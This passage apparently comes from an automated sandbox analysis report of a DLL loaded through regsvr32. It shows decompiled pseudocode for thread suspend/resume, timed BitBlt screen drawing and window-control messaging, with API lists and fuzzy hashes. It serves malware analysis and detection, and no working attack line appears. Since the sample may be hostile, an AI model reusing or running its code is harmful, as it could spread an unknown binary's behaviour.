						E1000BDC0(_t132);
					}
					_t93 = _v32 + 0xfffffff0;
					_v4 = 0xffffffff;
					asm("lock xadd [edx], ecx");
					if((_t132 | 0xffffffff) - 1 <= 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t93)) + 4))))(_t93);
					}
					goto L9;
				}
			}


























                                                                                                                0x1000c640
                                                                                                                0x1000c640
                                                                                                                0x1000c642
                                                                                                                0x1000c64d
                                                                                                                0x1000c64e
                                                                                                                0x1000c655
                                                                                                                0x1000c65c
                                                                                                                0x1000c661
                                                                                                                0x1000c667
                                                                                                                0x1000c67d
                                                                                                                0x1000c68b
                                                                                                                0x1000c78d
                                                                                                                0x1000c78d
                                                                                                                0x1000c799
                                                                                                                0x1000c79d
                                                                                                                0x1000c7b1
                                                                                                                0x1000c7b8
                                                                                                                0x1000c7ba
                                                                                                                0x1000c7bf
                                                                                                                0x1000c7c6
                                                                                                                0x1000c7c6
                                                                                                                0x1000c7d7
                                                                                                                0x1000c7df
                                                                                                                0x1000c7e8
                                                                                                                0x1000c7f0
                                                                                                                0x1000c7ff
                                                                                                                0x1000c804
                                                                                                                0x1000c80e
                                                                                                                0x1000c844
                                                                                                                0x1000c84d
                                                                                                                0x1000c856
                                                                                                                0x1000c86b
                                                                                                                0x1000c870
                                                                                                                0x1000c874
                                                                                                                0x1000c810
                                                                                                                0x1000c81d
                                                                                                                0x1000c826
                                                                                                                0x1000c82f
                                                                                                                0x1000c834
                                                                                                                0x1000c836
                                                                                                                0x1000c836
                                                                                                                0x1000c87d
                                                                                                                0x1000c880
                                                                                                                0x1000c88e
                                                                                                                0x1000c895
                                                                                                                0x1000c89f
                                                                                                                0x1000c89f
                                                                                                                0x1000c895
                                                                                                                0x1000c8a5
                                                                                                                0x1000c8b4
                                                                                                                0x1000c69f
                                                                                                                0x1000c69f
                                                                                                                0x1000c6a6
                                                                                                                0x1000c6a8
                                                                                                                0x1000c6ad
                                                                                                                0x1000c6b4
                                                                                                                0x1000c6b4
                                                                                                                0x1000c6c5
                                                                                                                0x1000c6c9
                                                                                                                0x1000c6d1
                                                                                                                0x1000c6da
                                                                                                                0x1000c6e9
                                                                                                                0x1000c6ee
                                                                                                                0x1000c6f8
                                                                                                                0x1000c730
                                                                                                                0x1000c739
                                                                                                                0x1000c742
                                                                                                                0x1000c757
                                                                                                                0x1000c75c
                                                                                                                0x1000c760
                                                                                                                0x1000c6fa
                                                                                                                0x1000c701
                                                                                                                0x1000c70e
                                                                                                                0x1000c71b
                                                                                                                0x1000c720
                                                                                                                0x1000c722
                                                                                                                0x1000c722
                                                                                                                0x1000c769
                                                                                                                0x1000c76c
                                                                                                                0x1000c77a
                                                                                                                0x1000c781
                                                                                                                0x1000c78b
                                                                                                                0x1000c78b
                                                                                                                0x00000000
                                                                                                                0x1000c781

                                                                                                                APIs
                                                                                                                • GetExitCodeThread.KERNEL32(?,DF7C0CDA,DF7C0CDA), ref: 1000C681
                                                                                                                • SuspendThread.KERNEL32(?), ref: 1000C701
                                                                                                                • SuspendThread.KERNEL32(?), ref: 1000C70E
                                                                                                                • ResumeThread.KERNEL32(?), ref: 1000C730
                                                                                                                • ResumeThread.KERNEL32(?), ref: 1000C739
                                                                                                                  • Part of subcall function 1001D2C4: IsWindow.USER32(?), ref: 1001D2D3
                                                                                                                • GetExitCodeThread.KERNEL32(?,?), ref: 1000C799
                                                                                                                • SuspendThread.KERNEL32(?), ref: 1000C81D
                                                                                                                • SuspendThread.KERNEL32(?), ref: 1000C826
                                                                                                                • ResumeThread.KERNEL32(?), ref: 1000C844
                                                                                                                • ResumeThread.KERNEL32(?), ref: 1000C84D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$ResumeSuspend$CodeExit$Window
                                                                                                                • String ID: Searching
                                                                                                                • API String ID: 1881788215-291028053
                                                                                                                • Opcode ID: 50f5ff4215dff875a8325bf096b0006136332da0b19e06f77ad7a191bff5b875
                                                                                                                • Instruction ID: 2116953bbfb5f2c777d961c5881e73fe07f5ab918cdb7214135486e8651d46b7
                                                                                                                • Opcode Fuzzy Hash: 50f5ff4215dff875a8325bf096b0006136332da0b19e06f77ad7a191bff5b875
                                                                                                                • Instruction Fuzzy Hash: D561BD752047029FD704DB64CC95E6BB3E5EF883A0F004A1DF66A8B295DF30E94ACB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10014EF7 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 141windowsleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10014EF7() {
				intOrPtr _t91;
				struct HDC__* _t92;
				void* _t99;
				void* _t111;
				int _t117;
				signed int _t130;
				signed short _t150;
				void* _t153;
				int _t155;
				void* _t157;

				while(1) {
					L18:
					_t117 =  *(_t157 + 0x38);
					while(1) {
						L19:
						BitBlt( *( *((intOrPtr*)(_t153 + 0x20)) + 4),  *(_t153 + 0x14),  *(_t153 + 0x18),  *(_t157 + 0x40), _t117,  *(_t157 + 0x2c),  *(_t153 + 8),  *(_t153 + 0xc), 0xcc0020);
						 *(_t153 + 0xc) =  *(_t153 + 0xc) + 0xffffffff;
						if( *(_t153 + 0xc) > 0) {
							goto L18;
						}
						while(1) {
							_t155 = 0;
							do {
								do {
									do {
										L26:
										 *(_t153 + 0x14) =  *(_t153 + 0x14) + 0x3c;
										 *(_t153 + 0x18) =  *(_t153 + 0x18) + 0x14;
										 *(_t153 + 0x10) =  *(_t153 + 0x10) + 1;
										Sleep(0xbb8);
										BitBlt( *( *((intOrPtr*)(_t153 + 0x20)) + 4), _t155, _t155,  *(_t157 + 0x24),  *(_t157 + 0x58),  *(_t157 + 0x24), _t155, _t155, 0x42);
										E10024592(_t157 + 0x20);
										 *((intOrPtr*)(_t153 + 0x1c)) =  *((intOrPtr*)(_t153 + 0x1c)) + 1;
										 *(_t157 + 0x50) = 0;
										 *(_t157 + 0x18) = 0x100572c4;
										E10024848(_t157 + 0x18);
										 *(_t157 + 0x50) = 0xffffffff;
										E100245A8(_t157 + 0x20);
										_t155 = 0;
										if( *((intOrPtr*)(_t153 + 0x1c)) >= 5) {
											 *((intOrPtr*)(_t153 + 0x1c)) = 0;
										}
										E10023F76(_t157 + 0x20);
										_t91 =  *((intOrPtr*)(_t153 + 0x20));
										_t161 = _t91 - _t155;
										 *(_t157 + 0x50) = _t155;
										if(_t91 != _t155) {
											_t92 =  *(_t91 + 4);
										} else {
											_t92 = 0;
										}
										E1002452E(_t157 + 0x24, 1, _t155, CreateCompatibleDC(_t92));
										 *(_t157 + 0x1c) = _t155;
										 *(_t157 + 0x18) = 0x100572e4;
										 *(_t157 + 0x50) = 1;
										_t150 =  *((intOrPtr*)(_t153 + 0x1c)) + 0xaf;
										E100247F5(_t157 + 0x1c, _t150, _t155, LoadBitmapA( *(E10023187(_t117, _t150, _t153, _t161) + 0xc), _t150 & 0x0000ffff));
										_t99 =  *(_t157 + 0x1c);
										if(_t99 != _t155) {
											SelectObject( *(_t157 + 0x24), _t99);
											_t99 =  *(_t157 + 0x1c);
										}
										GetObjectA(_t99, 0x18, _t157 + 0x30);
										_t117 = GetSystemMetrics(_t155);
										 *(_t157 + 0x18) = _t117;
										_t130 = GetSystemMetrics(1);
										 *(_t157 + 0x58) = _t130;
										if( *(_t153 + 0x14) > (0x66666667 * _t117 >> 0x20 >> 1 >> 0x1f) + (0x66666667 * _t117 >> 0x20 >> 1)) {
											 *(_t153 + 0x14) = _t155;
										}
										if( *(_t153 + 0x18) > (0x66666667 * _t130 >> 0x20 >> 1 >> 0x1f) + (0x66666667 * _t130 >> 0x20 >> 1)) {
											 *(_t153 + 0x18) = _t155;
										}
										if( *(_t153 + 0x10) > 1) {
											 *(_t153 + 0x10) = _t155;
										}
										_t111 =  *(_t153 + 0x10) - _t155;
										if(_t111 != 0) {
											goto L15;
										}
										_t117 =  *(_t157 + 0x34);
										__eflags = _t117 - _t155;
										 *(_t153 + 8) = _t117;
									} while (_t117 <= _t155);
									while(1) {
										BitBlt( *( *((intOrPtr*)(_t153 + 0x20)) + 4),  *(_t153 + 0x14),  *(_t153 + 0x18), _t117,  *(_t157 + 0x44),  *(_t157 + 0x2c),  *(_t153 + 8),  *(_t153 + 0xc), 0xcc0020);
										 *(_t153 + 8) =  *(_t153 + 8) + 0xffffffff;
										__eflags =  *(_t153 + 8);
										if( *(_t153 + 8) <= 0) {
											break;
										}
										_t117 =  *(_t157 + 0x34);
									}
									_t155 = 0;
									goto L26;
									L15:
								} while (_t111 != 1);
								_t117 =  *(_t157 + 0x38);
								 *(_t153 + 0xc) = _t117;
							} while (_t117 <= _t155);
							goto L19;
						}
					}
				}
			}













                                                                                                                0x10014f00
                                                                                                                0x10014f00
                                                                                                                0x10014f00
                                                                                                                0x10014f04
                                                                                                                0x10014f04
                                                                                                                0x10014f2b
                                                                                                                0x10014f31
                                                                                                                0x10014f39
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10014f8b
                                                                                                                0x10014f8b
                                                                                                                0x10014f8d
                                                                                                                0x10014f8d
                                                                                                                0x10014f8d
                                                                                                                0x10014f8d
                                                                                                                0x10014f8d
                                                                                                                0x10014f91
                                                                                                                0x10014f9a
                                                                                                                0x10014fa2
                                                                                                                0x10014fc4
                                                                                                                0x10014fce
                                                                                                                0x10014fd3
                                                                                                                0x10014fda
                                                                                                                0x10014fdf
                                                                                                                0x10014fe7
                                                                                                                0x10014ff0
                                                                                                                0x10014ff8
                                                                                                                0x10014df0
                                                                                                                0x10014df6
                                                                                                                0x10014df8
                                                                                                                0x10014df8
                                                                                                                0x10014dff
                                                                                                                0x10014e04
                                                                                                                0x10014e07
                                                                                                                0x10014e09
                                                                                                                0x10014e0d
                                                                                                                0x10014e13
                                                                                                                0x10014e0f
                                                                                                                0x10014e0f
                                                                                                                0x10014e0f
                                                                                                                0x10014e22
                                                                                                                0x10014e27
                                                                                                                0x10014e2b
                                                                                                                0x10014e36
                                                                                                                0x10014e3b
                                                                                                                0x10014e59
                                                                                                                0x10014e5e
                                                                                                                0x10014e64
                                                                                                                0x10014e6c
                                                                                                                0x10014e72
                                                                                                                0x10014e72
                                                                                                                0x10014e7e
                                                                                                                0x10014e8d
                                                                                                                0x10014e91
                                                                                                                0x10014e97
                                                                                                                0x10014eac
                                                                                                                0x10014eb0
                                                                                                                0x10014eb2
                                                                                                                0x10014eb2
                                                                                                                0x10014ec8
                                                                                                                0x10014eca
                                                                                                                0x10014eca
                                                                                                                0x10014ed1
                                                                                                                0x10014ed3
                                                                                                                0x10014ed3
                                                                                                                0x10014ed9
                                                                                                                0x10014edb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10014f3d
                                                                                                                0x10014f41
                                                                                                                0x10014f43
                                                                                                                0x10014f43
                                                                                                                0x10014f54
                                                                                                                0x10014f7b
                                                                                                                0x10014f81
                                                                                                                0x10014f85
                                                                                                                0x10014f89
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10014f50
                                                                                                                0x10014f50
                                                                                                                0x10014f8b
                                                                                                                0x00000000
                                                                                                                0x10014edd
                                                                                                                0x10014edd
                                                                                                                0x10014ee6
                                                                                                                0x10014eec
                                                                                                                0x10014eec
                                                                                                                0x00000000
                                                                                                                0x10014ef5
                                                                                                                0x10014f8b
                                                                                                                0x10014f04

                                                                                                                APIs
                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 10014E17
                                                                                                                • LoadBitmapA.USER32 ref: 10014E4E
                                                                                                                • SelectObject.GDI32(?,?), ref: 10014E6C
                                                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 10014E7E
                                                                                                                • GetSystemMetrics.USER32 ref: 10014E8B
                                                                                                                • GetSystemMetrics.USER32 ref: 10014E95
                                                                                                                • BitBlt.GDI32(?,0000003C,00000014,?,?,?,?,?,00CC0020), ref: 10014F2B
                                                                                                                • Sleep.KERNEL32(00000BB8), ref: 10014FA2
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00000042), ref: 10014FC4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsObjectSystem$BitmapCompatibleCreateLoadSelectSleep
                                                                                                                • String ID: gfff$gfff
                                                                                                                • API String ID: 1121727421-3084402119
                                                                                                                • Opcode ID: d3cfe3c45f35c1032e74498a24e822426951bd9ca6eb631fe77debd20703ad92
                                                                                                                • Instruction ID: d6159a051e035c351a0165b5dde6699716bc4dbbbf81474a2c8df47965471cf1
                                                                                                                • Opcode Fuzzy Hash: d3cfe3c45f35c1032e74498a24e822426951bd9ca6eb631fe77debd20703ad92
                                                                                                                • Instruction Fuzzy Hash: DF5189B51047459FC364CF65D88492BB7F8FB98310F018A1CF5868B2A1DB70F949CBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10014EF9 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 141windowsleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10014EF9() {
				intOrPtr _t83;
				struct HDC__* _t84;
				void* _t91;
				void* _t103;
				int _t117;
				signed int _t123;
				signed short _t149;
				void* _t153;
				int _t154;
				void* _t157;

				while(1) {
					L18:
					_t117 =  *(_t157 + 0x38);
					while(1) {
						L19:
						BitBlt( *( *((intOrPtr*)(_t153 + 0x20)) + 4),  *(_t153 + 0x14),  *(_t153 + 0x18),  *(_t157 + 0x40), _t117,  *(_t157 + 0x2c),  *(_t153 + 8),  *(_t153 + 0xc), 0xcc0020);
						 *(_t153 + 0xc) =  *(_t153 + 0xc) + 0xffffffff;
						if( *(_t153 + 0xc) > 0) {
							goto L18;
						}
						while(1) {
							_t154 = 0;
							do {
								do {
									do {
										L26:
										 *(_t153 + 0x14) =  *(_t153 + 0x14) + 0x3c;
										 *(_t153 + 0x18) =  *(_t153 + 0x18) + 0x14;
										 *(_t153 + 0x10) =  *(_t153 + 0x10) + 1;
										Sleep(0xbb8);
										BitBlt( *( *((intOrPtr*)(_t153 + 0x20)) + 4), _t154, _t154,  *(_t157 + 0x24),  *(_t157 + 0x58),  *(_t157 + 0x24), _t154, _t154, 0x42);
										E10024592(_t157 + 0x20);
										 *((intOrPtr*)(_t153 + 0x1c)) =  *((intOrPtr*)(_t153 + 0x1c)) + 1;
										 *(_t157 + 0x50) = 0;
										 *(_t157 + 0x18) = 0x100572c4;
										E10024848(_t157 + 0x18);
										 *(_t157 + 0x50) = 0xffffffff;
										E100245A8(_t157 + 0x20);
										_t154 = 0;
										if( *((intOrPtr*)(_t153 + 0x1c)) >= 5) {
											 *((intOrPtr*)(_t153 + 0x1c)) = 0;
										}
										E10023F76(_t157 + 0x20);
										_t83 =  *((intOrPtr*)(_t153 + 0x20));
										_t159 = _t83 - _t154;
										 *(_t157 + 0x50) = _t154;
										if(_t83 != _t154) {
											_t84 =  *(_t83 + 4);
										} else {
											_t84 = 0;
										}
										E1002452E(_t157 + 0x24, 1, _t154, CreateCompatibleDC(_t84));
										 *(_t157 + 0x1c) = _t154;
										 *(_t157 + 0x18) = 0x100572e4;
										 *(_t157 + 0x50) = 1;
										_t149 =  *((intOrPtr*)(_t153 + 0x1c)) + 0xaf;
										E100247F5(_t157 + 0x1c, _t149, _t154, LoadBitmapA( *(E10023187(_t117, _t149, _t153, _t159) + 0xc), _t149 & 0x0000ffff));
										_t91 =  *(_t157 + 0x1c);
										if(_t91 != _t154) {
											SelectObject( *(_t157 + 0x24), _t91);
											_t91 =  *(_t157 + 0x1c);
										}
										GetObjectA(_t91, 0x18, _t157 + 0x30);
										_t117 = GetSystemMetrics(_t154);
										 *(_t157 + 0x18) = _t117;
										_t123 = GetSystemMetrics(1);
										 *(_t157 + 0x58) = _t123;
										if( *(_t153 + 0x14) > (0x66666667 * _t117 >> 0x20 >> 1 >> 0x1f) + (0x66666667 * _t117 >> 0x20 >> 1)) {
											 *(_t153 + 0x14) = _t154;
										}
										if( *(_t153 + 0x18) > (0x66666667 * _t123 >> 0x20 >> 1 >> 0x1f) + (0x66666667 * _t123 >> 0x20 >> 1)) {
											 *(_t153 + 0x18) = _t154;
										}
										if( *(_t153 + 0x10) > 1) {
											 *(_t153 + 0x10) = _t154;
										}
										_t103 =  *(_t153 + 0x10) - _t154;
										if(_t103 != 0) {
											goto L15;
										}
										_t117 =  *(_t157 + 0x34);
										__eflags = _t117 - _t154;
										 *(_t153 + 8) = _t117;
									} while (_t117 <= _t154);
									while(1) {
										BitBlt( *( *((intOrPtr*)(_t153 + 0x20)) + 4),  *(_t153 + 0x14),  *(_t153 + 0x18), _t117,  *(_t157 + 0x44),  *(_t157 + 0x2c),  *(_t153 + 8),  *(_t153 + 0xc), 0xcc0020);
										 *(_t153 + 8) =  *(_t153 + 8) + 0xffffffff;
										__eflags =  *(_t153 + 8);
										if( *(_t153 + 8) <= 0) {
											break;
										}
										_t117 =  *(_t157 + 0x34);
									}
									_t154 = 0;
									goto L26;
									L15:
								} while (_t103 != 1);
								_t117 =  *(_t157 + 0x38);
								 *(_t153 + 0xc) = _t117;
							} while (_t117 <= _t154);
							goto L19;
						}
					}
				}
			}













                                                                                                                0x10014f00
                                                                                                                0x10014f00
                                                                                                                0x10014f00
                                                                                                                0x10014f04
                                                                                                                0x10014f04
                                                                                                                0x10014f2b
                                                                                                                0x10014f31
                                                                                                                0x10014f39
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10014f8b
                                                                                                                0x10014f8b
                                                                                                                0x10014f8d
                                                                                                                0x10014f8d
                                                                                                                0x10014f8d
                                                                                                                0x10014f8d
                                                                                                                0x10014f8d
                                                                                                                0x10014f91
                                                                                                                0x10014f9a
                                                                                                                0x10014fa2
                                                                                                                0x10014fc4
                                                                                                                0x10014fce
                                                                                                                0x10014fd3
                                                                                                                0x10014fda
                                                                                                                0x10014fdf
                                                                                                                0x10014fe7
                                                                                                                0x10014ff0
                                                                                                                0x10014ff8
                                                                                                                0x10014df0
                                                                                                                0x10014df6
                                                                                                                0x10014df8
                                                                                                                0x10014df8
                                                                                                                0x10014dff
                                                                                                                0x10014e04
                                                                                                                0x10014e07
                                                                                                                0x10014e09
                                                                                                                0x10014e0d
                                                                                                                0x10014e13
                                                                                                                0x10014e0f
                                                                                                                0x10014e0f
                                                                                                                0x10014e0f
                                                                                                                0x10014e22
                                                                                                                0x10014e27
                                                                                                                0x10014e2b
                                                                                                                0x10014e36
                                                                                                                0x10014e3b
                                                                                                                0x10014e59
                                                                                                                0x10014e5e
                                                                                                                0x10014e64
                                                                                                                0x10014e6c
                                                                                                                0x10014e72
                                                                                                                0x10014e72
                                                                                                                0x10014e7e
                                                                                                                0x10014e8d
                                                                                                                0x10014e91
                                                                                                                0x10014e97
                                                                                                                0x10014eac
                                                                                                                0x10014eb0
                                                                                                                0x10014eb2
                                                                                                                0x10014eb2
                                                                                                                0x10014ec8
                                                                                                                0x10014eca
                                                                                                                0x10014eca
                                                                                                                0x10014ed1
                                                                                                                0x10014ed3
                                                                                                                0x10014ed3
                                                                                                                0x10014ed9
                                                                                                                0x10014edb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10014f3d
                                                                                                                0x10014f41
                                                                                                                0x10014f43
                                                                                                                0x10014f43
                                                                                                                0x10014f54
                                                                                                                0x10014f7b
                                                                                                                0x10014f81
                                                                                                                0x10014f85
                                                                                                                0x10014f89
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10014f50
                                                                                                                0x10014f50
                                                                                                                0x10014f8b
                                                                                                                0x00000000
                                                                                                                0x10014edd
                                                                                                                0x10014edd
                                                                                                                0x10014ee6
                                                                                                                0x10014eec
                                                                                                                0x10014eec
                                                                                                                0x00000000
                                                                                                                0x10014ef5
                                                                                                                0x10014f8b
                                                                                                                0x10014f04

                                                                                                                APIs
                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 10014E17
                                                                                                                • LoadBitmapA.USER32 ref: 10014E4E
                                                                                                                • SelectObject.GDI32(?,?), ref: 10014E6C
                                                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 10014E7E
                                                                                                                • GetSystemMetrics.USER32 ref: 10014E8B
                                                                                                                • GetSystemMetrics.USER32 ref: 10014E95
                                                                                                                • BitBlt.GDI32(?,0000003C,00000014,?,?,?,?,?,00CC0020), ref: 10014F2B
                                                                                                                • Sleep.KERNEL32(00000BB8), ref: 10014FA2
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00000042), ref: 10014FC4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsObjectSystem$BitmapCompatibleCreateLoadSelectSleep
                                                                                                                • String ID: gfff$gfff
                                                                                                                • API String ID: 1121727421-3084402119
                                                                                                                • Opcode ID: 38c02c7b247e89f22e7bf342b96bc1f65394471f5d19e3c025dc83780a737c20
                                                                                                                • Instruction ID: 8802ad821846f76bbbe8fb1b312adab2a2dfde2f0c1ac157e225ad3b35639ec6
                                                                                                                • Opcode Fuzzy Hash: 38c02c7b247e89f22e7bf342b96bc1f65394471f5d19e3c025dc83780a737c20
                                                                                                                • Instruction Fuzzy Hash: 7B5177B55047859FC364CF65D88492BB7F8FB98310F018A1CF5868B6A1DB70F949CBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10014290 Relevance: 18.3, APIs: 12, Instructions: 263windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E10014290(void* __ebx, long _a4) {
				long _v4;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t95;
				int* _t96;
				int* _t97;
				int* _t101;
				int* _t102;
				int* _t106;
				int* _t107;
				int* _t111;
				int* _t112;
				long _t116;
				long _t144;
				signed char _t147;
				int* _t153;
				int _t163;
				void* _t165;
				intOrPtr _t168;
				intOrPtr _t170;
				intOrPtr _t172;
				intOrPtr _t174;
				signed char _t190;
				signed char _t195;
				void* _t202;
				signed char _t213;
				void* _t218;
				int _t219;
				long _t220;

				_t162 = __ebx;
				_t220 = _a4;
				_t95 =  *(_t220 + 0x18);
				_t218 = _t165;
				if(( !_t95 & 0x00000001) == 0) {
					__eflags = _t95 & 0x00000001;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(_t220 + 0x14)));
						_push(4);
						E10020287(__ebx, _t202, _t218, _t220, __eflags);
					}
					_t96 =  *(_t220 + 0x28);
					_t168 =  *((intOrPtr*)(_t220 + 0x2c));
					_t203 =  &(_t96[1]);
					__eflags =  &(_t96[1]) - _t168;
					if( &(_t96[1]) > _t168) {
						__eflags = _t96 - _t168 + 4;
						E1001FADC(_t220, _t203, _t96 - _t168 + 4);
					}
					_t97 =  *(_t220 + 0x28);
					 *(_t220 + 0x28) =  &(_t97[1]);
					SendMessageA( *(_t218 + 0x1a4), 0xf1,  *_t97, 0);
					__eflags =  *(_t220 + 0x18) & 0x00000001;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(_t220 + 0x14)));
						_push(4);
						E10020287(_t162, _t203, _t218, _t220, __eflags);
					}
					_t101 =  *(_t220 + 0x28);
					_t170 =  *((intOrPtr*)(_t220 + 0x2c));
					_t204 =  &(_t101[1]);
					__eflags =  &(_t101[1]) - _t170;
					if( &(_t101[1]) > _t170) {
						__eflags = _t101 - _t170 + 4;
						E1001FADC(_t220, _t204, _t101 - _t170 + 4);
					}
					_t102 =  *(_t220 + 0x28);
					 *(_t220 + 0x28) =  &(_t102[1]);
					SendMessageA( *(_t218 + 0x150), 0xf1,  *_t102, 0);
					__eflags =  *(_t220 + 0x18) & 0x00000001;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(_t220 + 0x14)));
						_push(4);
						E10020287(_t162, _t204, _t218, _t220, __eflags);
					}
					_t106 =  *(_t220 + 0x28);
					_t172 =  *((intOrPtr*)(_t220 + 0x2c));
					_t205 =  &(_t106[1]);
					__eflags =  &(_t106[1]) - _t172;
					if( &(_t106[1]) > _t172) {
						__eflags = _t106 - _t172 + 4;
						E1001FADC(_t220, _t205, _t106 - _t172 + 4);
					}
					_t107 =  *(_t220 + 0x28);
					 *(_t220 + 0x28) =  &(_t107[1]);
					SendMessageA( *(_t218 + 0xfc), 0xf1,  *_t107, 0);
					__eflags =  *(_t220 + 0x18) & 0x00000001;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(_t220 + 0x14)));
						_push(4);
						E10020287(_t162, _t205, _t218, _t220, __eflags);
					}
					_t111 =  *(_t220 + 0x28);
					_t174 =  *((intOrPtr*)(_t220 + 0x2c));
					_t206 =  &(_t111[1]);
					__eflags =  &(_t111[1]) - _t174;
					if( &(_t111[1]) > _t174) {
						__eflags = _t111 - _t174 + 4;
						E1001FADC(_t220, _t206, _t111 - _t174 + 4);
					}
					_t112 =  *(_t220 + 0x28);
					 *(_t220 + 0x28) =  &(_t112[1]);
					SendMessageA( *(_t218 + 0xa8), 0xf1,  *_t112, 0);
					_t116 = SendMessageA( *(_t218 + 0x1a4), 0xf0, 0, 0);
					__eflags = _t116;
					if(_t116 == 0) {
						return _t116;
					} else {
						E1001D39A(_t218 + 0x130, 0);
						E1001D39A(_t218 + 0xdc, 0);
						E1001D39A(_t218 + 0x88, 0);
						SendMessageA( *(_t218 + 0x150), 0xf1, 0, 0);
						SendMessageA( *(_t218 + 0xfc), 0xf1, 0, 0);
						return SendMessageA( *(_t218 + 0xa8), 0xf1, 0, 0);
					}
				}
				_push(__ebx);
				_v4 = SendMessageA( *(_t218 + 0xa8), 0xf0, 0, 0);
				_a4 = SendMessageA( *(_t218 + 0xfc), 0xf0, 0, 0);
				_t144 = SendMessageA( *(_t218 + 0x150), 0xf0, 0, 0);
				_t209 =  *(_t218 + 0x1a4);
				_t163 = _t144;
				_t219 = SendMessageA( *(_t218 + 0x1a4), 0xf0, 0, 0);
				_t147 =  !( *(_t220 + 0x18));
				_t225 = _t147 & 0x00000001;
				if((_t147 & 0x00000001) == 0) {
					_push( *((intOrPtr*)(_t220 + 0x14)));
					_push(2);
					E10020287(_t163, _t209, _t219, _t220, _t225);
				}
				if( &(( *(_t220 + 0x28))[1]) >  *((intOrPtr*)(_t220 + 0x2c))) {
					E1001FA65(_t220);
				}
				 *( *(_t220 + 0x28)) = _t219;
				 *(_t220 + 0x28) =  &(( *(_t220 + 0x28))[1]);
				_t190 =  !( *(_t220 + 0x18));
				_t227 = _t190 & 0x00000001;
				if((_t190 & 0x00000001) == 0) {
					_push( *((intOrPtr*)(_t220 + 0x14)));
					_push(2);
					E10020287(_t163,  *((intOrPtr*)(_t220 + 0x14)), _t219, _t220, _t227);
				}
				if( &(( *(_t220 + 0x28))[1]) >  *((intOrPtr*)(_t220 + 0x2c))) {
					E1001FA65(_t220);
				}
				 *( *(_t220 + 0x28)) = _t163;
				 *(_t220 + 0x28) =  &(( *(_t220 + 0x28))[1]);
				_t213 =  !( *(_t220 + 0x18));
				_t229 = _t213 & 0x00000001;
				if((_t213 & 0x00000001) == 0) {
					_push( *((intOrPtr*)(_t220 + 0x14)));
					_push(2);
					E10020287(_t163, _t213, _t219, _t220, _t229);
				}
				if( &(( *(_t220 + 0x28))[1]) >  *((intOrPtr*)(_t220 + 0x2c))) {
					E1001FA65(_t220);
				}
				 *( *(_t220 + 0x28)) = _a4;
				 *(_t220 + 0x28) =  &(( *(_t220 + 0x28))[1]);
